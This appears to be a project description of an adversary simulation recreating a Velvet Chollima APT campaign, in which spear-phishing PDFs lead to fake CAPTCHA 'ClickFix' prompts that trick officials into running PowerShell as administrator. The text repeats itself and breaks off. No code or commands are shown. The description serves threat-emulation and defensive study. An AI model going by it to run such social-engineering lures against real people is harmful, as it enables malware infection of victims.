Velvet Chollima APT Adversary Simulation
Contents
Velvet Chollima APT Adversary Simulation
This is a simulation of an attack by the (Velvet Chollima) APT group targeting South Korean government officials. The attack campaign began in January 2025 and also targeted NGOs, government agencies, and media companies across North America, South America, Europe, and East Asia. The attack chain starts with a spear-phishing email containing a PDF attachment. However, when targets attempt to read the document, they are redirected to a Fake-Captcha link instructing them to run PowerShell as an administrator and execute attacker-provided code. This simulation is based on research from Microsoft’s Threat Intelligence and Bleeping Computer: https://www.bleepingcomputer.com/news/security/dprk-hackers-dupe-targets-into-typing-powershell-commands-as-admin/
The attackers used a new tactic known as ClickFix, a social engineering technique that has gained traction, particularly for distributing malware.
ClickFix involves deceptive error messages or prompts that trick victims into executing malicious code themselves, often via PowerShell commands, ultimately leading to malware infections.
Microsoft's Threat Intelligence: https://x.com/MsftSecIntel/status/1889407814604296490
According to Microsoft's Threat Intelligence …
This is a simulation of an attack by the (Velvet Chollima) APT group targeting South Korean government officials. The attack campaign began in January 2025 and also targeted NGOs, government agencies, and media companies across North America, South America, Europe, and East Asia. The attack chain starts with a spear-phishing email containing a PDF attachment. However, when targets attempt to read the document, they are redirected to a Fake-Captcha link instructing them to run PowerShell as an administrator and execute attacker-provided code. This simulation is based on research from Microsoft’s Threat Intelligence and Bleeping Computer: https://www.bleepingcomputer.com/news/security/dprk-hackers-dupe-targets-into-typing-powershell-commands-as-admin/
The attackers used a new tactic known as ClickFix, a social engineering technique that has gained traction, particularly for distributing malware.
ClickFix involves deceptive error messages or prompts that trick victims into executing malicious code themselves, often via PowerShell commands, ultimately leading to malware infections.
Microsoft's Threat Intelligence: https://x.com/MsftSecIntel/status/1889407814604296490
According to Microsoft's Threat Intelligence …